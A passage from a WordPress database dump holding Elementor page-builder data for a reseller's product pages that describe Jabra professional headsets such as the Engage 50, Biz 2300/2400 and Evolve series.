src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Engage_50_3.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"249\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3dd0dc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"33c6633\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Engage 50<\\/strong><\\/h2><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform \\u2013 whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.<\\/p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3befa73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a85e5e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d60555\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48b3240\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"89270cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fd3b8a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><strong>Jabra Biz Wired Series<\\/strong><\\/h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d449904\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"656485e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fbc0249\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2400 II<\\/strong><\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9369d27\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"83ee6d0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2873 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\\\" alt=\\\"\\\" width=\\\"179\\\" height=\\\"179\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0dd5280\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"66a6f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0fd4de1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2875 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/jabra_biz_2400_ii_mono_3-in-1.jpg\\\" alt=\\\"\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e37a9d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f989140\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Jabra BIZ 2400 II Mono 3-in-1<\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"38cc4d8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"a2798fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cb65d6a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2400 II DUO<\\/strong><\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f72a8b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8703933\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2873 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\\\" alt=\\\"\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7f07070\",\"elType\":\"section\",\"settings\":{\"structure\":\"34\"},\"elements\":[{\"id\":\"7909a7f\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5bb3037\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"349a8fd\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/85RJqPjfjng\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"a7a7db0\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"a1a4e97\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1a4c36b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b09d5f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a83600\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"6a528d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"21f7fb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2877 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD_Duo.png\\\" alt=\\\"\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0869d9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bec7706\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300<\\/strong><\\/h2><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8f9ee62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"27b34fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b9598c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300 QD<\\/strong><\\/h2><p>Jabra Biz\\u2122 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35b2553\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4047bd4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2876 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD.png\\\" alt=\\\"\\\" width=\\\"186\\\" height=\\\"186\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"175e85c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"519e230\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6bfb90c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2877 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD_Duo.png\\\" alt=\\\"\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9e4889b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b26b188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"solution-group-card__product-name ng-binding\\\" style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300 QD DUO<\\/strong><\\/h2><p>Jabra Biz\\u2122 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ec1e2e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7187165\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8d1d85b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 1500<\\/strong><\\/h2><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b92f5f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6008c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2879 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_QD.png\\\" alt=\\\"\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e34ebbb\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"48b05fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cb3f7ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\"><img class=\\\" wp-image-2878 alignnone\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_USB.png\\\" alt=\\\"\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73b78bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a82801\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 1500 DUO USB<\\/strong><\\/h2><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a829b4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3b4834e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b38b08e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e8e065f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7b07964\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8537,3649,'_elementor_version','2.5.14'),(8595,1446,'_elementor_css','a:6:{s:4:\"time\";i:1571988190;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),(8544,3650,'_elementor_version','2.5.14'),(8547,3651,'_wp_page_template','template-fullwidth.php'),(8548,3651,'_elementor_edit_mode','builder'),(8549,3651,'_elementor_template_type','post'),(8550,3651,'_elementor_data','[{\"id\":\"9b05eed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e3e83dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"272a30b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1 style=\\\"text-align: center;\\\"><strong>Jabra<\\/strong><\\/h1><h3 style=\\\"text-align: center;\\\">Sound that\\u2019s engineered for you<\\/h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those you\\u2019re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.<\\/p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba72cc4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c728c08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"63d6963\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra Evolve Series<\\/h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"828f173\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"03\",\"right\":\"03\",\"bottom\":\"03\",\"left\":\"03\",\"isLinked\":true},\"border_color\":\"#4f4f4f\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[{\"id\":\"1f337bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":28.919,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"9a63143\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve.jpg\",\"id\":2851},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05c6f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":71.081,\"margin\":{\"unit\":\"px\",\"top\":\"43\",\"right\":\"43\",\"bottom\":\"43\",\"left\":\"43\",\"isLinked\":true}},\"elements\":[{\"id\":\"5625496\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Better concentration, greater productivity<\\/h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.<\\/p><ul><li>World-class speakers to deliver amazing sound for calls and music.<\\/li><li>Call-management features allow for incredible ease-of-use..<\\/li><li>Compatible with all leading UC platforms.<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"337d102\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1b419c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b34a6f3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"41e7d34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"01d0215\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"background_color\":\"#f9f9f9\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"40f3597\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 65t<\\/strong><\\/h2><p>The Jabra Evolve 65t are the world\\u2019s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGels\\u2122 for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\",\"_background_background\":\"classic\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e503076\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"54e8d0f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone wp-image-2852 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/JabraEvolve65t_ProductImage.png\\\" alt=\\\"\\\" width=\\\"163\\\" height=\\\"163\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"716ef9e\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"e8ecb8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93ab181\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2853 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_80.png\\\" alt=\\\"\\\" width=\\\"203\\\" height=\\\"203\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2ea5436\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"242de0e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 80<\\/strong><\\/h2><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f4bed1d\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"07d43f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c84f84f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 75e<\\/strong><\\/h2><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation \\u2013 but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de05f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93f376b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2854 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Evolve75e.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e653f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"ab57536\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f104529\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2855 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\\\" alt=\\\"\\\" width=\\\"201\\\" height=\\\"201\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8392c16\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"d1ec16d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"ng-binding ng-scope\\\" style=\\\"text-align: center;\\\"><strong>Jabra Evolve 75<\\/strong><\\/h2><p class=\\\"ng-binding ng-scope\\\">Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise \\u2013 and need mobility around the workspace. Move up to 100ft\\/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4c0a5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d8290d\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"97dea23\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 65 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0731e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89a0b3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2856 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_65.png\\\" alt=\\\"\\\" width=\\\"203\\\" height=\\\"203\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"815f5e9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"5a46717\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"434120f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone  wp-image-2857 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\\\" alt=\\\"\\\" width=\\\"209\\\" height=\\\"209\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"910e26f\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"5e871e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 40 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton 